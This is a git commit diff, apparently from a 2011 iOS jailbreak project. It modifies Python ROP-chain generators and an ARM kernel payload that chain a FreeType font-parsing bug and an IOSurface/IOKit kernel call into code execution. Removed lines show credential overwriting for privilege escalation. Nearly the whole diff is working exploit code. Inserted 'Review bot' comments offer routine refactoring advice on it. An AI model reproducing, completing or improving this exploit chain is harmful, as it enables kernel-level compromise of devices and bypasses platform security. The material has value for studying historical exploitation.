
*sigh*

1 parent f29c944 commit 50f4a0ff9a19abca0c051e99c5d4836afa19cfb4 @comex committed Mar 27, 2011
Showing with 58 additions and 62 deletions.
  1. +10 −14 catalog/catalog.py
  2. +12 −19 catalog/kcode.S
  3. +1 −1 data
  4. +35 −28 goo/two.py
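--- a/catalog/catalog.py
+++ b/catalog/catalog.py
@@ -32,14 +32,14 @@ def dbg_result():
 back = sys._getframe().f_back
 funcall('_printf', ptr('Result for %s:%d was %%08x\n' % (back.f_code.co_filename, back.f_lineno), True), result)
+dmini.init(cachefile, True)
 dmini.init(kernfile, False)
 code_addr = 0x80000400 # XXX
-weirdfile = dmini.Connection('kcode.o', rw=True).relocate(dmini.cur, code_addr).nth_segment(0)[:-8]
+weirdfile = dmini.Connection('kcode.o', rw=True).relocate(dmini.cur, code_addr).nth_segment(0)[:-4]
 count = 0
 stuff = ''
-kreturn = pointed('')
 while True:
 namelen = patchfp.read(4)
 if len(namelen) == 0: break
@@ -51,7 +51,7 @@ def dbg_result():
 continue
 stuff += I(addr, len(data)) + data
 count += 1
-weirdfile = pointed(weirdfile + I(count, pointer(kreturn)) + stuff)
+weirdfile = pointed(weirdfile + I(count) + stuff)
 init('R4', 'R5', 'R6', 'R7', 'PC', pic=True)
 funcall('_copyin', pointer(weirdfile), code_addr, len(weirdfile))
 set_fwd('PC', code_addr)
@@ -91,11 +91,10 @@ def wrap(num):
 if mode == 'dejavu' and four_dot_three:
 p_1000, _1000 = stackunkpair()
 p_100c, _100c = stackunkpair()
- funcall('_dyld_get_image_header', 0)
+ funcall('__dyld_get_image_header', 0)
 store_r0_to(p_1000)
 add_r0_by(0xc)
 store_r0_to(p_100c)
-
 else:
 p_1000 = ptrI(0x1000)
 _1000 = 0x1000
@@ -121,8 +120,9 @@ def wrap(num):
 funcall('_munmap', p_1000, 0x1000, load_r0=True); dbg_result()
 funcall('_mmap', p_1000, 0x1000, 3, 0x1001, 0, load_r0=True); dbg_result()
-funcall('_memcpy', p_1000, ptr(kstuff), len(kstuff), load_r0=True)
 funcall('_mlock', p_1000, 0x1000, load_r0=True); dbg_result()
+memcpy = '_memcpy$VARIANT$CortexA8' if four_dot_three else '_memcpy'
+funcall(memcpy, p_1000, ptr(kstuff), len(kstuff), load_r0=True)
 funcall('iosurface._IOSurfaceWrapClientImage', 1, _100c, 0x41424752, 4, 0x40000, 0);
 if mode == 'dejavu':
@@ -143,15 +143,11 @@ def wrap(num):
 connect = ptrI(0)
 funcall('iokit._IOServiceOpen', None, task_self, 0, connect); dbg_result()
+dbg_result(); funcall('_abort')
+
 js = ptrI(surface_id, 0, 9 if four_dot_three else 8, 0)
 funcall('iokit._IOConnectCallScalarMethod', connect, 1, js, 2, 0, 0, load_r0=True)
-clear_fwd() # we're not coming back the usual way
-heapadd(kreturn, fwd('PC'))
-fwd('R7')
-set_sp_to_sp()
-make_avail()
-
 # do some housekeeping
 # (but don't bother if we're going to exec)
 if mode == 'dejavu':
@@ -197,7 +193,8 @@ def wrap(num):
 set_r0_to(1337)
 fancy_set_sp_to(reloc(0xe, 0x60c)) # offset determined by experiment
 else:
- funcall('_execl', ptr('/sbin/lunchd', True), 0)
+ lunchd = ptr('/sbin/lunchd', True)
+ funcall('_execl', lunchd, lunchd, 0)
 goo.sheap.append(pad(weirdfile, 4))
@@ -207,7 +204,6 @@ def wrap(num):
 # add sp, #400; pop {r4, r5, pc}
 parse_callback = dmini.cur.find_basic('+ 64 b0 30 bd').value
- print hex(parse_callback)
 actual_parse_callback = dmini.cur.private_sym('ft._T1_Parse_Glyph').value
 final = final.unpack()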
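Review bot: The `[:-4]` on the new `weirdfile = ...nth_segment(0)[:-4]` line in the first hunk is an undocumented cross-file offset: it appears to strip the trailing `count` word declared at the end of catalog/kcode.S, and the change from 8 to 4 tracks the `addr: .long 0` label this same commit removes there, but nothing in catalog.py records that dependency. A comment such as `# strip the trailing data word(s) declared after stuff/count in kcode.S; keep in sync with that file` on the weirdfile line would stop the two files from drifting on the next edit. Separately, the version-specific symbol choices are now spread over three unrelated spots in this file (`__dyld_get_image_header`, the `'_memcpy$VARIANT$CortexA8' if four_dot_three else '_memcpy'` selection, and `9 if four_dot_three else 8`); collecting them into one per-version table near the top would make every `four_dot_three` assumption reviewable in one place. The enclosing function `wrap` starts and ends outside the hunks.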
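--- a/catalog/kcode.S
+++ b/catalog/kcode.S
@@ -1,11 +1,9 @@
 .syntax unified
 .arm
 start:
- mrc p15, 0, sp, c13, c0, 4
- ldr sp, [sp, #0x54]
- add sp, #0x3000
-
- ldrd r6, r7, count
+ sub r7, sp, #(56 - 0xc)
+ add sp, pc, #0xa00
+ ldr r6, count
 adr r5, stuff
 pf_loop:
@@ -23,20 +21,15 @@ pf_loop:
 subs r6, #1
 bne pf_loop
- bl _current_proc
- bl _proc_unlock
- bl _current_proc
- bl _proc_ucred
- str r6, [r0, #0xc]
-
-#ifdef __ARM_ARCH_7A__
- mov r5, #0x30
-#else
- mov r5, #0x10
-#endif
- msr spsr, r5
- ldm r7!, {pc}^
+ mrc p15, 0, sp, c13, c0, 4
+ ldr sp, [sp, #0x54]
+sp_loop:
+ ldr r0, [sp], #4
+ cmp r0, r7
+ bne sp_loop
+
+ add sp, #(9*4)
+ pop {r4-r7, pc}
 count: .long 0
-addr: .long 0
 stuff: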
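--- a/data
+++ b/data
@@ -1 +1 @@
-Subproject commit 5d762dcfb90a4e9d6daf1c1f1b3834e8a75b9b3c
+Subproject commit 2f29fb6d481dfeef3119cb0359d18d97d9f67b8f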
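--- a/goo/two.py
+++ b/goo/two.py
@@ -59,7 +59,13 @@ def command(cmd, stuff):
 commands.append(I(cmd, len(stuff) + 8))
 commands.append(stuff)
+reloc_base = None
+
 def segment(segname, vmaddr, vmsize, data, maxprot, initprot, sects=[]):
+ global reloc_base
+ # dumb, but that's the spec!
+ if reloc_base is None: reloc_base = vmaddr
+
 length = len(data)
 if vmsize is None: vmsize = (length + 0xfff) & ~0xfff
 offset = len(segments)
@@ -112,7 +118,7 @@ def import_sym(ordinal, name, subtract=0):
 strx,
 0, # n_type = N_UNDF
 0, # n_sect is ignored?
- ordinal << 8, # n_desc
+ (ordinal + 1) << 8, # n_desc
 subtract, # n_value (with prebound set, this is subtracted)
 )
 return len(symtab) / 12 - 1
@@ -125,36 +131,37 @@ def reloc(sym, address):
 r_type = 0
 relocs += I(
- address,
+ (address - reloc_base) & 0xffffffff,
 (r_type << 28) |
 (r_extern << 27) |
- (r_length << 26) |
+ (r_length << 25) |
 (r_pcrel << 24) |
 sym)
+segment('__LINKEDIT',
+ linkedit_address,
+ linkedit_size,
+ linkedit,
+ PROT_READ | PROT_WRITE,
+ PROT_READ | PROT_WRITE,
+ [{'sectname': '__init',
+ 'offset': pointer(initializer),
+ 'size': 4,
+ 'flags': 0x9, # S_MOD_INIT_FUNC_POINTERS
+ }]
+)
+
 libs = {}
 for path in data['libs']:
 libs[path] = load_dylib(path, 0, 0, 0x010000)
-sym = import_sym(libs['/usr/lib/libSystem.B.dylib'], '_getpid', subtract=dmini.cur.sym('_getpid'))
+sym = import_sym(libs['/usr/lib/libSystem.B.dylib'], '_getpid', subtract=dmini.cur.sym('_getpid')&~1)
 for addr in rop_relocs:
 reloc(sym, addr)
 symtab = pointed(symtab)
 relocs = pointed(relocs)
 strtab = pointed(strtab)
-command(0xb, I( # LC_DYSYMTAB
- 0, 0, # localsym
- 0, 0, # extdefsym
- 0, len(symtab) / 12, # undefsym
- 0, 0, # toc
- 0, 0, # modtab
- 0, 0, # extrefsym
- 0, 0, # indirectsym
- pointer(relocs), len(relocs) / 8, # extrel
- 0, 0, # locrel
-))
-
 command(2, I( # LC_SYMTAB
 pointer(symtab), # symoff
 len(symtab) / 12, # nsyms
@@ -167,18 +174,18 @@ def reloc(sym, address):
 linkedit_rest.append(relocs)
 linkedit_rest.append(strtab)
-segment('__LINKEDIT',
- linkedit_address,
- linkedit_size,
- linkedit,
- PROT_READ | PROT_WRITE,
- PROT_READ | PROT_WRITE,
- [{'sectname': '__init',
- 'offset': pointer(initializer),
- 'size': 4,
- 'flags': 0x9, # S_MOD_INIT_FUNC_POINTERS
- }]
-)
+command(0xb, I( # LC_DYSYMTAB
+ 0, 0, # localsym
+ 0, 0, # extdefsym
+ 0, len(symtab) / 12, # undefsym
+ 0, 0, # toc
+ 0, 0, # modtab
+ 0, 0, # extrefsym
+ 0, 0, # indirectsym
+ pointer(relocs), len(relocs) / 8, # extrel
+ 0, 0, # locrel
+))
+
 segment('__ROP',
 rop_address,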
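Review bot: `reloc()` in the third hunk now reads the module global `reloc_base`, which is only ever assigned by the first `segment()` call, so a `reloc()` issued before any `segment()` fails with a TypeError on `address - reloc_base` instead of an error naming the real cause; the commit appears to move the `segment('__LINKEDIT', ...)` call ahead of the `for addr in rop_relocs: reloc(sym, addr)` loop precisely to satisfy that order, but nothing states the dependency. A guard at the top of `reloc`, `if reloc_base is None: raise RuntimeError('reloc() called before any segment(); reloc_base is unset')`, together with a one-line comment on the `__LINKEDIT` call saying it must precede the relocation loop because it fixes `reloc_base`, would make the ordering explicit and fail loudly if it is broken later. The unchanged `def segment(..., sects=[])` signature in the first hunk carries a shared mutable default; `sects=None` with `sects = [] if sects is None else sects` in the body is the safer form. `reloc`'s definition starts outside the hunk.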
